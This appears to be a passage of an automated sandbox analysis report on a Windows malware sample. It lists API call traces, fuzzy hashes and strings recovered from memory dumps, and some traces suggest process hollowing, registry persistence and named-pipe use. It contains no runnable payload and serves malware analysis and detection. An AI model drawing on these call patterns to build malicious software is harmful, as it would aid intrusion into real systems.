  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
